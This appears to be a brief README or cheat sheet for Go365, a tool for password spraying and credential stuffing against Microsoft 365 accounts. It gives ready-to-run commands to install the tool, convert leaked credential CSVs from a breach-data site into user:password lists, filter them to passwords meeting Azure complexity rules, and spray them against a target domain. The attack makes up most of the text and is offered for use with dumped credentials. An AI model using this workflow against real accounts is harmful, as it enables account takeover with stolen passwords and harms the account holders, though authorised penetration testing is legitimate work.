# Go365

A tool for attacking O365 users with password stuffing/spraying.

# Install

```bash
wget https://github.com/optiv/Go365/releases/download/v2.0/Go365_2.0_Linux_x86_64.tar.gz
tar -xzvf Go365_2.0_Linux_x86_64.tar.gz
```

# Massage a CSV into a format Go365 can use

The example below works for a CSV extracted from sysleaks.com:

```bash
cut -d',' -f2,3 YOURCSV.csv | tr ',' ':' | sort -t':' -k1 | uniq > filtered.csv
```

# Then take THAT CSV and filter it even further so it meets Azure requirements

Which are:

  • Minimum of 8 characters
  • 3 of these 4 properties:
      • Uppercase letters
      • Lowercase letters
      • Numbers
      • Symbols

```bash
awk -F: '{
  pass=$2;
  classes=0;
  if (pass ~ /[a-z]/) classes++;
  if (pass ~ /[A-Z]/) classes++;
  if (pass ~ /[0-9]/) classes++;
  if (pass ~ /[^a-zA-Z0-9]/) classes++;
  if (length(pass) >= 8 && classes >= 3) print $0
}' filtered.csv > superfiltered.txt
```

# Spray a list of usernames and passwords against M365/Azure/whatever-they're-calling-it-this-week

```bash
./Go365 -endpoint graph -up UP.txt -debug -w 300 -o CLIENT_output.txt -d domain.com
```

The UP.txt would be a "users and passwords" file that you'd generate by some other means, such as a dehashed dump.